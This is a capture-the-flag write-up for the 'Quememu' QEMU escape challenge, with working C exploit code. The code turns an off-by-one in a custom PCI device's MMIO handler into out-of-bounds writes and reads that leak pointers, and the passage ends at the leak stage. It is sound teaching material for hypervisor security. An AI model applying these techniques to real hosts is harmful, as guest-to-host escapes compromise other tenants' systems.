Quememu


In this challenge we are given a PCI (Peripheral Component Interconnect) device that communicates via MMIO (memory-mapped I/O). This device has been added to the qemu codebase, and we are also given the compiled binary and a diff.txt file with the changes:

# ls -l
total 90964
-rw-rw-r--  1 root root      718 Feb 13 21:42 Dockerfile
-rwxrwxr-x  1 root root       59 Feb 13 21:42 deploy_docker.sh
-rw-rw-r--  1 root root     5494 Feb 13 21:41 diff.txt
-rw-rw-r--  1 root root      151 Feb 13 21:42 docker-compose.yml
-rw-rw-r--  1 root root       26 Feb 13 21:42 flag
-rw-r--r--  1 root root  1320526 Feb 13 21:43 initramfs.cpio.gz
drwxrwxr-x  7 root root     4096 Feb 13 21:43 pc-bios
-rwxrwxr-x  1 root root 76179320 Feb 13 21:43 qemu-system-x86_64
-rwxrwxr-x  1 root root      331 Feb 13 21:43 run.sh
-rw-------  1 root root 11614792 Feb 13 21:42 vmlinuz-5.15.0-92-generic
-rw-rw-r--  1 root root      176 Feb 13 21:42 xinetd

In the diff, we can see the file quememu.c, which is the source code of the vulnerable device. In this challenge we have to exploit the vulnerable PCI device to escape from qemu.

Setup environment

The environment configuration is similar to kernel exploitation challenges, since we have to compile an exploit in C and put it in initramfs. This directory is compressed and passed to qemu.

To work more comfortably, we can use a script go.sh like the following to compile, compress and launch qemu in one go:

#!/usr/bin/env bash

musl-gcc -s -static -o exploit "$1" || exit 1
mv exploit initramfs/
cd initramfs
find . -print0 | cpio --null -ov --format=newc | gzip -9 > initramfs.cpio.gz
mv initramfs.cpio.gz ..
cd ..

sh run.sh

The exploit is compiled statically with musl-gcc because it generates smaller binaries without external library dependencies. musl-gcc can be installed using apt install musl-tools.

In the qemu script (run.sh) we need to modify the paths to the files vmlinuz, initramfs.cpio.gz and pc-bios. It is also possible that qemu fails with an error related to the library version SLIRP 4.7. If this happens, the best option is to take the library from the Docker container that comes with the challenge (using docker cp, for example):

docker cp <container-id>:/usr/lib/x86_64-linux-gnu/libslirp.so.0.4.0 .

Source code analysis

The quememu device uses the following structure:

typedef struct {
  PCIDevice pdev;
  MemoryRegion mmio;
  char buff[BUFF_SIZE];
  struct {
    base_t base;
    short off;
    hwaddr src; 
  } state;
} QueMemuState;

It allows us to read and write the values of this structure (buff, base, off, src) using the functions below:

static uint64_t quememu_mmio_read(void *opaque, hwaddr addr, unsigned size) {
    QueMemuState *quememu = (QueMemuState *) opaque;
    uint64_t val = 0;

    switch (addr) {
    case 0x00:
      trigger_rw(quememu, 1);
      break;
    case 0x04:
      val = quememu->state.base;
      break;
    case 0x08:
      val = quememu->state.off;
      break;
    case 0x0c:
      val = quememu->state.src;
      break;
    default:
      val = 0xFABADA;
      break;
    }

    return val;
}

static void quememu_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
    QueMemuState *quememu = (QueMemuState *) opaque;

    switch (addr) {
    case 0x00:
      trigger_rw(quememu, 0);
      break;
    case 0x04:
      if ((base_t) val <= MAX_BASE) quememu->state.base = val;
      break;
    case 0x08:
      if ((short) val >= 0) quememu->state.off = val;
      break;
    case 0x0c:
      quememu->state.src = val;
      break;
    default:
      break;
    }
}
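To make the register checks easier to reason about, here is a toy Python model of the base, off and src registers. It is only a sketch: the class name Registers and the helpers to_u8 and to_i16 are ours, and it models the C casts (base_t) and (short) but not the transfer triggered at address 0x00.

```python
MAX_BASE = 20


def to_u8(val):
    """Model of the (base_t) cast: keep the low 8 bits."""
    return val & 0xFF


def to_i16(val):
    """Model of the (short) cast: keep 16 bits and interpret them as signed."""
    val &= 0xFFFF
    return val - 0x10000 if val & 0x8000 else val


class Registers:
    """Toy model of the base/off/src registers and their write checks."""

    def __init__(self):
        self.base = 0
        self.off = 0
        self.src = 0

    def write(self, addr, val):
        if addr == 0x04 and to_u8(val) <= MAX_BASE:
            self.base = to_u8(val)
        elif addr == 0x08 and to_i16(val) >= 0:
            self.off = to_i16(val)
        elif addr == 0x0C:
            self.src = val

    def read(self, addr):
        if addr == 0x00:
            return 0  # the real device triggers a transfer here and returns 0
        return {0x04: self.base, 0x08: self.off, 0x0C: self.src}.get(addr, 0xFABADA)
```

With this model, writing 21 to 0x04 or 0x8000 to 0x08 leaves the registers untouched, which is why the legitimate interface alone cannot set a radix above 20 or a negative offset.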

The trigger_rw function is the one that really reads or writes in the device’s memory:

static void trigger_rw(QueMemuState *quememu, bool is_write) {
  if (quememu->state.base == 0) {
    return;
  }

  // Don't change base cause we already use base 16
  if (quememu->state.base == 0x10) { 
    cpu_physical_memory_rw(quememu->state.src, &quememu->buff[quememu->state.off], MAX_RW, is_write);
    return;
  }

  unsigned short n = quememu->state.off;
  unsigned long long multiplier = 1;
  unsigned long long new_off = 0;

  for (int i = 0; i < sizeof(n) * 2; ++i) {
    // Use nibble % base (e.g. 7 in base 3 = 1)
    new_off += (consume_nibble(&n) % quememu->state.base) * multiplier; 
    multiplier *= quememu->state.base;
  }

  cpu_physical_memory_rw(quememu->state.src, &quememu->buff[new_off], MAX_RW, is_write);
}

And the consume_nibble function returns the least significant 4 bits of the number and right-shifts the number itself by 4 bits:

static unsigned char consume_nibble(unsigned short *n) {
  unsigned char nibble = *n << 4;
  nibble = nibble >> 4;
  *n = *n >> 4;

  return nibble;
}
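The radix conversion is easier to follow with a small model. The following Python sketch mirrors consume_nibble and the loop in trigger_rw; the name new_off for the wrapper function is ours, and the special cases for base 0 and base 16 are left out on purpose.

```python
def consume_nibble(n):
    """Return (low nibble of n, n shifted right by 4), like the C helper."""
    return n & 0xF, (n >> 4) & 0xFFFF


def new_off(off, base):
    """Model of the offset computed by trigger_rw for a base other than 0 or 16."""
    n = off & 0xFFFF  # off is copied into an unsigned short before the loop
    multiplier = 1
    result = 0
    for _ in range(4):  # sizeof(unsigned short) * 2 nibbles
        nibble, n = consume_nibble(n)
        result += (nibble % base) * multiplier
        multiplier *= base
    return result


print(new_off(0x7FFF, 20))
print(new_off(0x0007, 3))
```

Each hexadecimal digit of off is treated as one digit of a number written in the configured radix, so the same off value maps to different buffer positions depending on base.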

It is also important to look at the constants and type definitions:

#define TYPE_PCI_QUEMEMU_DEVICE "quememu"
#define QUEMEMU_MMIO_SIZE 0x10000
#define BUFF_SIZE 0x10000
#define MAX_BASE 20
#define MAX_RW BUFF_SIZE - (pow(MAX_BASE, 3) * 0x7 + pow(MAX_BASE, 2) * 0xF + MAX_BASE * 0xF + 0xF - 1)

typedef unsigned char base_t;

A suspicious line is the following:

#define MAX_RW BUFF_SIZE - (pow(MAX_BASE, 3) * 0x7 + pow(MAX_BASE, 2) * 0xF + MAX_BASE * 0xF + 0xF - 1)

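It is a weird expression, because they could have simply written the result of the operation. If we look closely, the value of MAX_RW is:

$$ \mathtt{MAX\_RW} = \mathtt{0x10000} - (20^3 \cdot 7 + 20^2 \cdot 15 + 20 \cdot 15 + 15 - 1) = 65536 - 62314 = 3222 $$

The subtracted number, 62314, corresponds to the digits 0x7FFE interpreted in base 20. The radix (numerical base) is a particular feature of this challenge, since it lets us configure the offset at which to write based on a radix.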

Vulnerability

However, the vulnerability of this device lies in the $-1$ term of the previous expression. The maximum offset that we can set is 0x7FFF (in hexadecimal), since the attribute off is a short (signed) and it is verified to be a non-negative number:

    case 0x08:
      if ((short) val >= 0) quememu->state.off = val;
      break;

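But if we use radix 20 (which is the maximum that we can use), then the new offset will be:

$$ \mathtt{new\_off} = 20^3 \cdot 7 + 20^2 \cdot 15 + 20 \cdot 15 + 15 = 62315 $$

And so, we have:

$$ \mathtt{new\_off} + \mathtt{MAX\_RW} = 62315 + 3222 = 65537 $$

and therefore,

$$ \mathtt{new\_off} + \mathtt{MAX\_RW} = \mathtt{0x10001} > \mathtt{0x10000} = \mathtt{BUFF\_SIZE} $$

With this new offset, if we write, we will be writing from buff[62315] to buff[65536], that is, up to buff[0x10000], one byte past the end of the buffer. And here we have an out-of-bounds (OOB) access.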

Actually, it is an OOB for both reading and writing, but for reading it is not interesting. On the other hand, the OOB write gives us the power to change the base attribute without any limitation. This happens because the base attribute is right after buff in the structure:

typedef struct {
  PCIDevice pdev;
  MemoryRegion mmio;
  char buff[BUFF_SIZE];
  struct {
    base_t base;
    short off;
    hwaddr src; 
  } state;
} QueMemuState;
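To see where each field of state lands relative to the end of buff, we can reproduce the inner struct with ctypes. This is only a sketch under two assumptions: hwaddr is a 64-bit unsigned integer, and the compiler uses the platform's natural alignment (which is what ctypes does by default). The class name State is ours.

```python
import ctypes


class State(ctypes.Structure):
    # Mirrors the anonymous `state` struct; hwaddr is assumed to be uint64_t.
    _fields_ = [
        ("base", ctypes.c_ubyte),
        ("off", ctypes.c_short),
        ("src", ctypes.c_uint64),
    ]


for name, _ in State._fields_:
    print(name, getattr(State, name).offset)
```

Under these assumptions base is the first byte after buff, but off starts at offset 2 instead of 1, because a short is 2-byte aligned. That leaves one padding byte between base and off, so overwriting both bytes of off takes 4 bytes past the end of buff, not 3.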

Exploit strategy

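Once we can change the base attribute to any value, we can get a much larger OOB. For example, if we set radix 21 and off to 0x7fff, the new offset will be $21^3 \cdot 7 + 21^2 \cdot 15 + 21 \cdot 15 + 15 = 71772$ (0x1185c), which is already past the end of buff (0x10000).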

Obviously, this offset does not help us much, because we go out of the limits. But we might think about our goal and then define a more appropriate offset for it.

When reviewing other qemu escape challenges such as Full Chain - Wall Maria from HITCON CTF 2023, we see that a good target is the MemoryRegion structure in the mmio attribute. The difference between this challenge and Full Chain - Wall Maria is that the position of mmio in the structure of the device changes. In this case, mmio is placed before buff (at a lower address), so we need a negative value in off to be able to modify it.

So, the minimum OOB we need is simply 2 bytes more than we have without making any modification. We can look for the value we need using Python:

>>> BUFF_SIZE = 0x10000
>>> MAX_BASE = 20
>>> MAX_RW = BUFF_SIZE - (pow(MAX_BASE,3)*0x7 + pow(MAX_BASE,2)*0xF + MAX_BASE*0xF + 0xF - 1)
>>> MAX_RW
3222
>>> b = 20
>>> hex(0x7 * b ** 3 + 0xf * b ** 2 + 0xf * b ** 1 + 0xf * b ** 0 + MAX_RW)
'0x10001'
>>>
>>> b = 21
>>> hex(0x6 * b ** 3 + 0xf * b ** 2 + 0x6 * b ** 1 + 0xa * b ** 0 + MAX_RW)
'0x10003'

OK, then the value 0x6f6a in radix 21 will allow us to get a 3-byte OOB, just enough to overwrite the base (1 byte) and off (2 bytes) fields.
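Instead of guessing digits by hand, the candidate offsets can be found by brute force over all non-negative short values. The following is a minimal sketch of that search; the function names new_off and offsets_with_overflow are ours, and the arithmetic follows the trigger_rw loop shown earlier.

```python
BUFF_SIZE = 0x10000
MAX_BASE = 20
MAX_RW = BUFF_SIZE - (MAX_BASE**3 * 0x7 + MAX_BASE**2 * 0xF + MAX_BASE * 0xF + 0xF - 1)


def new_off(off, base):
    """Reinterpret the four nibbles of off as digits in the given base."""
    return sum(((off >> (4 * i)) & 0xF) % base * base**i for i in range(4))


def offsets_with_overflow(base, extra_bytes):
    """All non-negative short offsets whose transfer ends extra_bytes past buff."""
    return [
        off
        for off in range(0x8000)
        if new_off(off, base) + MAX_RW - BUFF_SIZE == extra_bytes
    ]


for extra in (3, 4):
    print(extra, [hex(o) for o in offsets_with_overflow(21, extra)])
```

The same helper can be reused for any other radix or overflow size when tuning the exploit.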

Once we get to read/write mmio, it is more or less simple to continue. We can obtain memory addresses from qemu and write a ROP chain or a pointer to some shellcode in a function table to read the flag.

Clarifications

Before starting to write, it is necessary to understand certain concepts:

First, to communicate with the PCI device using MMIO, we will create a memory region with mmap that is linked to the device. In this way, every time we read from or write to it, the device will perform a certain action.
On the other hand, the src attribute used by the PCI device holds a (guest) physical memory address, which is where the device copies data from or to. We must allocate a buffer in virtual memory and find the physical address that backs it, so that the device can exchange data with our buffer.
To open the device, we can launch qemu and list the PCI devices. Then we look for the one we want to exploit using the identifiers that appear in the source code:

   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # lspci
00:01.0 Class 0601: 8086:7000
00:04.0 Class 00ff: 1234:face
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
/root # cat /sys/devices/pci0000:00/0000:00:04.0/device
0xface
/root # ls /sys/devices/pci0000:00/0000:00:04.0/
ari_enabled               irq                       resource
broken_parity_status      link                      resource0
class                     local_cpulist             revision
config                    local_cpus                subsystem
consistent_dma_mask_bits  modalias                  subsystem_device
d3cold_allowed            msi_bus                   subsystem_vendor
device                    numa_node                 uevent
dma_mask_bits             power                     vendor
driver_override           power_state               waiting_for_supplier
enable                    remove
firmware_node             rescan

The file we will use in the exploit is resource0.

The program we have to exploit is qemu. Therefore, to debug, we can work from two points of view: the qemu process itself (on the host) and the exploit that runs inside qemu.
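The manual lookup with lspci and the sysfs files shown above can also be expressed as a small script. The sketch below is only an illustration in Python (the challenge initramfs does not necessarily ship an interpreter, so in practice the path is hardcoded in the C exploit); find_pci_device is a hypothetical helper name, and the root parameter exists just to make the function testable.

```python
import os


def find_pci_device(vendor, device, root="/sys/bus/pci/devices"):
    """Return sysfs directories of PCI devices matching the vendor and device IDs."""
    matches = []
    for name in sorted(os.listdir(root)):
        path = os.path.join(root, name)
        try:
            with open(os.path.join(path, "vendor")) as f:
                found_vendor = int(f.read().strip(), 16)
            with open(os.path.join(path, "device")) as f:
                found_device = int(f.read().strip(), 16)
        except OSError:
            continue  # not a PCI device directory, or attributes unreadable
        if (found_vendor, found_device) == (vendor, device):
            matches.append(path)
    return matches
```

For this challenge the call would be find_pci_device(0x1234, 0xface), and resource0 inside the returned directory is the file to mmap.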

Exploit development

To start, we will write the following auxiliary functions:

uint8_t* mmio_mem;


void mmio_write(uint32_t addr, uint32_t value) {
  *(uint32_t*) (mmio_mem + addr) = value;
}

uint32_t mmio_read(uint32_t addr) {
  return *(uint32_t*) (mmio_mem + addr);
}

void set_buff() {
  mmio_write(0x00, 0);
}

void set_base(uint32_t base) {
  mmio_write(0x4, base);
}

void set_off(uint32_t off) {
  mmio_write(0x8, off);
}

void set_src(uint32_t src) {
  mmio_write(0xc, src);
}

uint32_t get_buff() {
  return mmio_read(0x0);
}

uint32_t get_base() {
  return mmio_read(0x4);
}

uint32_t get_off() {
  return mmio_read(0x8);
}

uint32_t get_src() {
  return mmio_read(0xc);
}

These functions allow us to read and write attributes in the PCI device structure. It may seem strange how mmio_read and mmio_write work. The key is that when performing a write operation in mmio_mem, the PCI device itself “will wake up” and will execute the corresponding function. And if we read in mmio_mem, another device function will be executed.

Interaction with the PCI device

To open the device and configure the memory region mmio_mem, we can do the following:

int main() {
  int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);

  if (mmio_fd < 0) {
    fprintf(stderr, "[!] Cannot open device\n");
    exit(1);
  }

  mmio_mem = mmap(NULL, 4 * PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
  
  if (mmio_mem == MAP_FAILED) {
    fprintf(stderr, "[!] mmio error\n");
    exit(1);
  }

And to see that we are actually interacting with the device, we can do the following tests:

  set_off(0);
  set_base(0x10);

  printf("[*] buff    ==> %x\n", get_buff());
  printf("[*] base    ==> %d\n", get_base());
  printf("[*] off     ==> 0x%hx\n", get_off());
  printf("[*] src     ==> %x\n", get_src());
  printf("[*] default ==> 0x%x\n\n", mmio_read(0x10));

# sh go.sh exploit.c
...

Booting from ROM..
   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # /exploit
[*] buff    ==> 0
[*] base    ==> 16
[*] off     ==> 0x0
[*] src     ==> 0
[*] default ==> 0xfabada

As can be seen, we have data that clearly comes from the device, such as 0xfabada, which is something that we have not explicitly written in mmio_mem. This happens because we have executed the read function with an addr (0x10) that is not handled, so the default case returns 0xfabada.

Great, now we have to map the buff attribute. For this, we need a function that finds the physical memory address of a virtual memory address (taken from nobodyisnobody):

uint64_t gva2gpa(void *addr) {
  uint64_t page = 0;
  int fd = open("/proc/self/pagemap", O_RDONLY);

  if (fd < 0) {
    fprintf(stderr, "[!] open error in gva2gpa\n");
    exit(1);
  }

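  lseek(fd, ((uint64_t) addr / PAGE_SIZE) * 8, SEEK_SET);
  read(fd, &page, 8);
  close(fd);  // called in a loop, so do not leak the descriptor

  // Bits 0-54 of a pagemap entry hold the page frame number
  return ((page & 0x7fffffffffffff) * PAGE_SIZE) | ((uint64_t) addr & 0xfff);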
}
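The arithmetic inside gva2gpa can be checked in isolation. The following Python sketch decodes a single /proc/self/pagemap entry; the function names are ours, and the check of the "present" bit (bit 63) is an addition that the C helper does not perform.

```python
PAGE_SIZE = 0x1000
PFN_MASK = (1 << 55) - 1  # bits 0-54 of a pagemap entry hold the page frame number
PRESENT_BIT = 1 << 63     # bit 63 is set when the page is present in RAM


def pagemap_offset(vaddr):
    """Byte offset of the 8-byte entry for vaddr inside /proc/self/pagemap."""
    return (vaddr // PAGE_SIZE) * 8


def entry_to_phys(entry, vaddr):
    """Translate a pagemap entry plus the virtual address into a physical address."""
    if not entry & PRESENT_BIT:
        raise ValueError("page is not present")
    return (entry & PFN_MASK) * PAGE_SIZE | (vaddr & (PAGE_SIZE - 1))


# Synthetic entry: present page with page frame number 0xb3e6
print(hex(entry_to_phys(PRESENT_BIT | 0xB3E6, 0x7F9A069C9000)))
```

This also shows why the buffer is touched with memset before translating it: a page that has never been accessed may not be present yet, and its entry would not contain a usable frame number.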

And now, we have to map some pages and check that pages that are adjacent in virtual memory are also adjacent in physical memory. This can be adapted from nobodyisnobody’s exploit:

  system("sysctl vm.nr_hugepages=32");  // Set huge page

  char *buff;
  uint64_t buff_gpa;

  while (1) {
    buff = mmap(0, 0x10 * PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS | MAP_NONBLOCK, -1, 0);

    if (buff == MAP_FAILED) {
      fprintf(stderr, "[!] cannot mmap buff\n");
      exit(1);
    }

    memset(buff, 0, 0x10 * PAGE_SIZE);
    buff_gpa = gva2gpa(buff);

    if (buff_gpa + PAGE_SIZE == gva2gpa(buff + PAGE_SIZE)) {
      break;
    }
  }

  printf("[*] buff virtual address  = %p\n", buff);
  printf("[*] buff physical address = %p\n\n", (void*) buff_gpa);

At this point, we can already configure the PCI device to start exploiting it. Recall that we use radix 20 and the maximum offset to get a 1-byte OOB write:

  set_src(buff_gpa);
  set_base(20);
  set_off(0x7fff);

  printf("[*] base ==> %d\n", get_base());
  printf("[*] off  ==> 0x%hx\n\n", get_off());

And we see that the parameters are alright:

   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # /exploit
vm.nr_hugepages = 32
[*] buff virtual address  = 0x7f9a069c9000
[*] buff physical address = 0xb3e6000

[*] base ==> 20
[*] off  ==> 0x7fff

Now, we proceed to change the base attribute in an “artificial” way, without using the functions of the PCI device:

  // modify base with OOB write
  memset(buff, 0, MAX_RW);
  buff[MAX_RW - 1] = 21;
  set_buff();

  printf("[+] base ==> %d\n\n", get_base());

If we execute the exploit again, we see that the base attribute has changed as we expected:

   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # /exploit
vm.nr_hugepages = 32
[*] buff virtual address  = 0x7fde2d468000
[*] buff physical address = 0x3ffd8000

[*] base ==> 20
[*] off  ==> 0x7fff

[+] base ==> 21

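Perfect, the next step is to use an offset of 0x6f6a, which would give us a 3-byte OOB to modify the off attribute in an “artificial” way. In fact, after testing, I discovered that the appropriate value was 0x6f6b, which gives us a 4-byte OOB. This is necessary here, most likely because the compiler inserts one padding byte between base (1 byte) and off (2 bytes, 2-byte aligned), so the high byte of off is the fourth byte after buff: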

  // modify off with OOB write
  set_off(0x6f6b);
  printf("[*] off  ==> 0x%hx\n\n", get_off());

  buff[MAX_RW - 4] = 0x10;
  buff[MAX_RW - 3] = 0;
  buff[MAX_RW - 2] = 0x00;
  buff[MAX_RW - 1] = 0xfe;

  set_buff();

  printf("[+] base ==> %d\n", get_base());
  printf("[+] off  ==> 0x%hx\n\n", get_off());

And as you can see, we already have a negative value in off (0xfe00, that is, -0x200 as a signed short, which is more than enough to reach mmio). On the other hand, we have taken the opportunity to set radix 16 again:

   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # /exploit
vm.nr_hugepages = 32
[*] buff virtual address  = 0x7f9f8de69000
[*] buff physical address = 0x327e5000

[*] base ==> 20
[*] off  ==> 0x7fff

[+] base ==> 21

[*] off  ==> 0x6f6b

[+] base ==> 16
[+] off  ==> 0xfe00
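To double-check what the device now holds in off, we can decode the four bytes written past buff. The sketch below assumes the layout base, one padding byte, then the two bytes of off in little-endian order (the usual x86-64 layout for this struct); the variable names are ours.

```python
import struct

# Bytes placed at the end of the transfer: base, padding, off low byte, off high byte
tail = bytes([0x10, 0x00, 0x00, 0xFE])

base = tail[0]
(off,) = struct.unpack("<h", tail[2:4])  # little-endian signed 16-bit

print(base, off, hex(off & 0xFFFF))
print("buff[0] is at uint64_t index", -off // 8)
```

Since off is negative, a transfer in radix 16 now starts that many bytes before buff, and the last line gives the index at which buff itself begins when the transferred data is viewed as an array of uint64_t.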

Leaking memory addresses

The next thing we can do is use the OOB read to access the mmio attribute (MemoryRegion structure). For this, we tell the device to copy MAX_RW bytes from its own memory, starting at buff[off] (which now lies before buff), into the physical memory behind our virtual buffer. Next, we interpret the data as uint64_t and print several values:

  get_buff();

  uint64_t* data = (uint64_t*) buff;

  for (int i = 0; i < 80; i++) {
    printf("%d: %lx\n", i, data[i]);
  }

This is the result:

   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # /exploit
vm.nr_hugepages = 32
[*] buff virtual address  = 0x7f50e1ae5000
[*] buff physical address = 0xb9e8000

[*] base ==> 20
[*] off  ==> 0x7fff

[+] base ==> 21

[*] off  ==> 0x6f6b

[+] base ==> 16
[+] off  ==> 0xfe00

0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
55a2dae78d90
0
55a2dbd16f60
1
55a2dbda4a70
1
0
0
55a2dbda4a70
55a2dbda4a70
55a2d9a79460
55a2dbda4a70
55a2dae4aae0
0
10000
0
febb0000
55a2d8c7f320
0
10001
0
0
1
0
55a2dbda5558
55a2dbd745e0
55a2dae4ab98
0
55a2dbda5578
55a2dbd696a0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0

We see a few pointers there. To identify them, we can analyze the MemoryRegion structure. Another option is to look for the pointer to mmio->ops. For this, we can use readelf on the qemu binary:

# readelf -s qemu-system-x86_64 | grep quememu
0000000000000000     0 FILE    LOCAL  DEFAULT  ABS quememu.c
00000000004282b0    16 FUNC    LOCAL  DEFAULT   16 pci_quememu_regi[...]
00000000014f73e0   104 OBJECT  LOCAL  DEFAULT   24 quememu_info.4
0000000000428360   118 FUNC    LOCAL  DEFAULT   16 quememu_mmio_write
00000000004283e0   125 FUNC    LOCAL  DEFAULT   16 quememu_mmio_read
0000000000428460   108 FUNC    LOCAL  DEFAULT   16 pci_quememu_realize
00000000014f7460    80 OBJECT  LOCAL  DEFAULT   24 quememu_mmio_ops
00000000004284d0   152 FUNC    LOCAL  DEFAULT   16 quememu_class_init
0000000000428570    73 FUNC    LOCAL  DEFAULT   16 quememu_instance_init

# readelf -s qemu-system-x86_64 | grep quememu_mmio_ops
00000000014f7460    80 OBJECT  LOCAL  DEFAULT   24 quememu_mmio_ops

There we see that the last three hexadecimal digits are 460, and coincide with the 40 index of the above list. So, we have the offset and the index in the array. With this we can calculate the base address of qemu (which has PIE).
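The base address computation is a single subtraction, but it is worth adding a sanity check, since a PIE binary is always loaded at a page-aligned address. This is a minimal sketch (pie_base is our name), fed with the value at index 40 of the dump above.

```python
QUEMEMU_MMIO_OPS_OFFSET = 0x14F7460  # offset of quememu_mmio_ops, from readelf


def pie_base(leaked_ops_ptr):
    """Compute the load address of qemu from a leaked quememu_mmio_ops pointer."""
    base = leaked_ops_ptr - QUEMEMU_MMIO_OPS_OFFSET
    if base & 0xFFF:
        raise ValueError("leak does not look like quememu_mmio_ops")
    return base


print(hex(pie_base(0x55A2D9A79460)))
```

If the wrong index is picked from the dump, the result will almost never be page-aligned, so the check catches the mistake before any address derived from it is used.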

Another important index is that of parent_obj, which is 30. This index gives us the relationship between positions in our buffer and positions in the device’s mmio structure (in other words, its index 0 is our index 30).

It would also be nice to have the address at which the buffer is located in qemu. For that, we can put a getchar call in the code and then attach GDB to the process. But first, let's add the data we already have:

#define QUEMEMU_MMIO_OPS_OFFSET 0x14f7460
#define QUEMEMU_MMIO_OPS_INDEX 40
#define QUEMEMU_MMIO_OPAQUE_INDEX 41
#define QUEMEMU_MMIO_PARENT_OBJ_INDEX 30

  uint64_t qemu_base_addr = data[QUEMEMU_MMIO_OPS_INDEX] - QUEMEMU_MMIO_OPS_OFFSET;
  printf("[+] qemu base address: 0x%lx\n", qemu_base_addr);

  getchar();

   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # /exploit
vm.nr_hugepages = 32
[*] buff virtual address  = 0x7f30a81bb000
[*] buff physical address = 0x2abf3000

[*] base ==> 20
[*] off  ==> 0x7fff

[+] base ==> 21

[*] off  ==> 0x6f6b

[+] base ==> 16
[+] off  ==> 0xfe00

0: 0
...
29: 0
30: 5614b174cd90
31: 0
32: 5614b25eaf60
33: 1
34: 5614b2678a70
35: 1
36: 0
37: 0
38: 5614b2678a70
39: 5614b2678a70
40: 5614b0eaf460
41: 5614b2678a70
42: 5614b171eae0
43: 0
44: 10000
45: 0
46: febb0000
47: 5614b00b5320
48: 0
49: 10001
50: 0
51: 0
52: 1
53: 0
54: 5614b2679558
55: 5614b26485e0
56: 5614b171eb98
57: 0
58: 5614b2679578
59: 5614b263d6a0
60: 0
...
79: 0
[+] qemu base address: 0x5614af9b8000

The first thing we can check is whether the base address of qemu is correct:

# gdb -q -p $(pidof qemu-system-x86_64) qemu-system-x86_64

gef> vmmap qemu
[ Legend:  Code | Heap | Stack | Writable | ReadOnly | None | RWX ]
Start              End                Size               Offset             Perm Path
0x00005614af9b8000 0x00005614afcd1000 0x0000000000319000 0x0000000000000000 r-- /root/HackOn/Quememu/qemu-system-x86_64
0x00005614afcd1000 0x00005614b0342000 0x0000000000671000 0x0000000000319000 r-x /root/HackOn/Quememu/qemu-system-x86_64
0x00005614b0342000 0x00005614b0692000 0x0000000000350000 0x000000000098a000 r-- /root/HackOn/Quememu/qemu-system-x86_64
0x00005614b0692000 0x00005614b1069000 0x00000000009d7000 0x0000000000cd9000 r-- /root/HackOn/Quememu/qemu-system-x86_64
0x00005614b1069000 0x00005614b117f000 0x0000000000116000 0x00000000016b0000 rw- /root/HackOn/Quememu/qemu-system-x86_64

Now, we can search for references to the mmio->ops address to find the mmio structure of the device:

gef> find 0x5614b0eaf460
[+] Searching '\x60\xf4\xea\xb0\x14\x56' in whole memory
[+] In '[heap]' (0x5614b1607000-0x5614b28ab000 [rw-])
  0x5614b26794f0:    60 f4 ea b0 14 56 00 00  70 8a 67 b2 14 56 00 00    |  `....V..p.g..V..  |
[+] In (0x7f45c1e00000-0x7f4601e00000 [rw-])
  0x7f45ec9f3140:    60 f4 ea b0 14 56 00 00  70 8a 67 b2 14 56 00 00    |  `....V..p.g..V..  |

Now, we know more or less where the structure is:

gef> x/30gx 0x5614b26794f0
0x5614b26794f0: 0x00005614b0eaf460      0x00005614b2678a70
0x5614b2679500: 0x00005614b171eae0      0x0000000000000000
0x5614b2679510: 0x0000000000010000      0x0000000000000000
0x5614b2679520: 0x00000000febb0000      0x00005614b00b5320
